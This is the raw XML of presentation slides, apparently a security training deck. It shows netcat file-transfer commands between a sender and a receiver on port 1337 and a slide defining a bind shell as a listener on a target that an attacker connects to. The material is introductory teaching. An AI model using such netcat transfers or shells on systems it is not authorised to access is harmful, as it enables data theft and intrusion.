                <a:gd name="textAreaBottom" fmla="*/ 808200 h 807480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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8" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838080" y="1090080"/>
            <a:ext cx="105148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64646"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> NetCat allows you to transfer files through local networks or the Internet. It provides an easier way to transfer data without the need for additional services.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29" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980000" y="2241720"/>
            <a:ext cx="1439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urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Sender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0" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9401400" y="2266560"/>
            <a:ext cx="1398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urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Receiver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1" name="TextBox 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3652920"/>
            <a:ext cx="397512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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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nc 10.10.25.8 1337 &lt; data.txt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2" name="TextBox 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100000" y="3633840"/>
            <a:ext cx="328464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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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nc –lvp 1337 &gt; data.txt </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="233" name="Group 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9159120" y="2657520"/>
            <a:ext cx="1663200" cy="945360"/>
            <a:chOff x="9159120" y="2657520"/>
            <a:chExt cx="1663200" cy="945360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Freeform: Shape 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9168480" y="3544920"/>
              <a:ext cx="1644120" cy="57960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1644120"/>
                <a:gd name="textAreaRight" fmla="*/ 1644840 w 1644120"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 57960"/>
                <a:gd name="textAreaBottom" fmla="*/ 58680 h 57960"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9338760" y="2657520"/>
              <a:ext cx="1303920" cy="879840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1303920"/>
                <a:gd name="textAreaRight" fmla="*/ 1304640 w 1303920"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 879840"/>
                <a:gd name="textAreaBottom" fmla="*/ 880560 h 879840"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9394560" y="2711520"/>
              <a:ext cx="1190520" cy="752760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1190520"/>
                <a:gd name="textAreaRight" fmla="*/ 1191240 w 1190520"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 752760"/>
                <a:gd name="textAreaBottom" fmla="*/ 753480 h 752760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9159120" y="3503880"/>
              <a:ext cx="1663200" cy="67680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1663200"/>
                <a:gd name="textAreaRight" fmla="*/ 1663920 w 1663200"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 67680"/>
                <a:gd name="textAreaBottom" fmla="*/ 68400 h 67680"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9876240" y="3511440"/>
              <a:ext cx="231840" cy="26640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 231840"/>
                <a:gd name="textAreaRight" fmla="*/ 232560 w 231840"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 26640"/>
                <a:gd name="textAreaBottom" fmla="*/ 27360 h 26640"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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9" name="Group 57"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9238320" y="3536640"/>
              <a:ext cx="58680" cy="16560"/>
              <a:chOff x="9238320" y="3536640"/>
              <a:chExt cx="58680" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="240" name="Rectangle: Rounded Corners 62"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9238320" y="3536640"/>
                <a:ext cx="5868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Rectangle: Rounded Corners 63"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9251640" y="3540600"/>
                <a:ext cx="3204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2" name="Group 58"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10654920" y="3536280"/>
              <a:ext cx="126720" cy="16560"/>
              <a:chOff x="10654920" y="3536280"/>
              <a:chExt cx="126720" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="243" name="Rectangle: Rounded Corners 60"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10654920" y="3536280"/>
                <a:ext cx="12672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Rectangle: Rounded Corners 61"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10679400" y="3540600"/>
                <a:ext cx="7812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5" name="Freeform: Shape 59"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9797760" y="2660400"/>
              <a:ext cx="786960" cy="807480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 786960"/>
                <a:gd name="textAreaRight" fmla="*/ 787680 w 786960"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 807480"/>
                <a:gd name="textAreaBottom" fmla="*/ 808200 h 807480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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6" name="Group 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1687680" y="5010480"/>
            <a:ext cx="1663200" cy="945360"/>
            <a:chOff x="1687680" y="5010480"/>
            <a:chExt cx="1663200" cy="945360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="247" name="Freeform: Shape 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1697040" y="5897880"/>
              <a:ext cx="1644120" cy="57960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1644120"/>
                <a:gd name="textAreaRight" fmla="*/ 1644840 w 1644120"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 57960"/>
                <a:gd name="textAreaBottom" fmla="*/ 58680 h 57960"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1867320" y="5010480"/>
              <a:ext cx="1303920" cy="879840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1303920"/>
                <a:gd name="textAreaRight" fmla="*/ 1304640 w 1303920"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 879840"/>
                <a:gd name="textAreaBottom" fmla="*/ 880560 h 879840"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 68"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1923120" y="5064480"/>
              <a:ext cx="1190520" cy="752760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1190520"/>
                <a:gd name="textAreaRight" fmla="*/ 1191240 w 1190520"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 752760"/>
                <a:gd name="textAreaBottom" fmla="*/ 753480 h 752760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1687680" y="5856840"/>
              <a:ext cx="1663200" cy="67680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1663200"/>
                <a:gd name="textAreaRight" fmla="*/ 1663920 w 1663200"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 67680"/>
                <a:gd name="textAreaBottom" fmla="*/ 68400 h 67680"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2404800" y="5864400"/>
              <a:ext cx="231840" cy="26640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 231840"/>
                <a:gd name="textAreaRight" fmla="*/ 232560 w 231840"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 26640"/>
                <a:gd name="textAreaBottom" fmla="*/ 27360 h 26640"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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2" name="Group 71"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1766880" y="5889240"/>
              <a:ext cx="58680" cy="16560"/>
              <a:chOff x="1766880" y="5889240"/>
              <a:chExt cx="58680" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="253" name="Rectangle: Rounded Corners 76"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1766880" y="5889240"/>
                <a:ext cx="5868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Rectangle: Rounded Corners 77"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1780200" y="5893560"/>
                <a:ext cx="3204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5" name="Group 72"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3183840" y="5889240"/>
              <a:ext cx="126720" cy="16560"/>
              <a:chOff x="3183840" y="5889240"/>
              <a:chExt cx="126720" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="256" name="Rectangle: Rounded Corners 74"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3183840" y="5889240"/>
                <a:ext cx="12672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Rectangle: Rounded Corners 75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3207960" y="5893560"/>
                <a:ext cx="7812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8" name="Freeform: Shape 73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2326320" y="5013360"/>
              <a:ext cx="786960" cy="807480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 786960"/>
                <a:gd name="textAreaRight" fmla="*/ 787680 w 786960"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 807480"/>
                <a:gd name="textAreaBottom" fmla="*/ 808200 h 807480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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9" name="TextBox 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="689760" y="6013440"/>
            <a:ext cx="417024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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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nc 10.10.25.8 1337 &gt; data.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260" name="Group 81"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9144360" y="5018040"/>
            <a:ext cx="1663200" cy="945360"/>
            <a:chOff x="9144360" y="5018040"/>
            <a:chExt cx="1663200" cy="945360"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="261" name="Freeform: Shape 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9153720" y="5905440"/>
              <a:ext cx="1644120" cy="57960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1644120"/>
                <a:gd name="textAreaRight" fmla="*/ 1644840 w 1644120"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 57960"/>
                <a:gd name="textAreaBottom" fmla="*/ 58680 h 57960"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9323640" y="5018040"/>
              <a:ext cx="1303920" cy="879840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1303920"/>
                <a:gd name="textAreaRight" fmla="*/ 1304640 w 1303920"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 879840"/>
                <a:gd name="textAreaBottom" fmla="*/ 880560 h 879840"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9379440" y="5071680"/>
              <a:ext cx="1190520" cy="752760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1190520"/>
                <a:gd name="textAreaRight" fmla="*/ 1191240 w 1190520"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 752760"/>
                <a:gd name="textAreaBottom" fmla="*/ 753480 h 752760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9144360" y="5864400"/>
              <a:ext cx="1663200" cy="67680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1663200"/>
                <a:gd name="textAreaRight" fmla="*/ 1663920 w 1663200"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 67680"/>
                <a:gd name="textAreaBottom" fmla="*/ 68400 h 67680"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9861120" y="5871960"/>
              <a:ext cx="231840" cy="26640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 231840"/>
                <a:gd name="textAreaRight" fmla="*/ 232560 w 231840"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 26640"/>
                <a:gd name="textAreaBottom" fmla="*/ 27360 h 26640"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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6" name="Group 87"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9223200" y="5896800"/>
              <a:ext cx="58680" cy="16560"/>
              <a:chOff x="9223200" y="5896800"/>
              <a:chExt cx="58680" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="267" name="Rectangle: Rounded Corners 92"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9223200" y="5896800"/>
                <a:ext cx="5868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Rectangle: Rounded Corners 93"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9236880" y="5901120"/>
                <a:ext cx="3204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69" name="Group 88"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10640160" y="5896800"/>
              <a:ext cx="126720" cy="16560"/>
              <a:chOff x="10640160" y="5896800"/>
              <a:chExt cx="126720" cy="16560"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="270" name="Rectangle: Rounded Corners 90"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10640160" y="5896800"/>
                <a:ext cx="126720" cy="16560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Rectangle: Rounded Corners 91"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10664280" y="5900760"/>
                <a:ext cx="78120" cy="7560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2" name="Freeform: Shape 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9782640" y="5020920"/>
              <a:ext cx="786960" cy="807480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 786960"/>
                <a:gd name="textAreaRight" fmla="*/ 787680 w 786960"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 807480"/>
                <a:gd name="textAreaBottom" fmla="*/ 808200 h 807480"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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3" name="TextBox 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8280000" y="6040440"/>
            <a:ext cx="320652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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN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nc –lvp 1337 &lt; data.txt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74" name="TextBox 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9515160" y="4592880"/>
            <a:ext cx="1464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urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Sender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75" name="TextBox 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1983600" y="4584600"/>
            <a:ext cx="143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urw-din"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>Receiver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76" name="Arrow: Left 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555000" y="5163120"/>
            <a:ext cx="5536800" cy="523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             Data Transferring on port 1337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77" name="Arrow: Right 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3384720" y="2770200"/>
            <a:ext cx="5783040" cy="57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B5771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Data Transferring on port 1337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231280" y="250920"/>
            <a:ext cx="7728840" cy="79632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90000"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0" strike="noStrike" cap="all" spc="197">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT"/>
              </a:rPr>
              <a:t>What is Bind shell ?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9" name="TextBox 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2231280" y="1535040"/>
            <a:ext cx="77288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bind shell is set up on the target host and binds to a specific port to listens for an incoming connection from the attacker.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280" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9875160" y="3491640"/>
            <a:ext cx="1224000" cy="1933200"/>
            <a:chOff x="9875160" y="3491640"/>
            <a:chExt cx="1224000" cy="1933200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="281" name="Freeform: Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9875160" y="3507480"/>
              <a:ext cx="1224000" cy="1715760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1224000"/>
                <a:gd name="textAreaRight" fmla="*/ 1224720 w 1224000"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1715760"/>
                <a:gd name="textAreaBottom" fmla="*/ 1716480 h 1715760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9875160" y="3538800"/>
              <a:ext cx="1224000" cy="1715760"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 1224000"/>
                <a:gd name="textAreaRight" fmla="*/ 1224720 w 1224000"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 1715760"/>
                <a:gd name="textAreaBottom" fmla="*/ 1716480 h 1715760"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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Freeform: Shape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10008000" y="5256720"/>
              <a:ext cx="958320" cy="168120"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 958320"/>
                <a:gd name="textAreaRight" fmla="*/ 959040 w 958320"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 168120"/>
                <a:gd name="textAreaBottom" fmla="*/ 168840 h 168120"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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rgbClr val="E2E7F4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Freeform: Shape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10038960" y="3491640"/>
              <a:ext cx="941400" cy="28080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="textAreaLeft" fmla="*/ 0 w 941400"/>
                <a:gd name="textAreaRight" fmla="*/ 942120 w 941400"/>
                <a:gd name="textAreaTop" fmla="*/ 0 h 28080"/>
                <a:gd name="textAreaBottom" fmla="*/ 28800 h 28080"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom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rgbClr val="B1C0E0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: Shape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10081440" y="372744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Freeform: Shape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9984240" y="367776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Freeform: Shape 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10889280" y="373680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: Shape 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10081440" y="410184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Freeform: Shape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9984240" y="405180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Freeform: Shape 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10889280" y="411120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Freeform: Shape 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10095480" y="452088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: Shape 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9998280" y="447084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: Shape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10902960" y="453024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: Shape 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10095480" y="492228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: Shape 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9998280" y="487260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: Shape 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
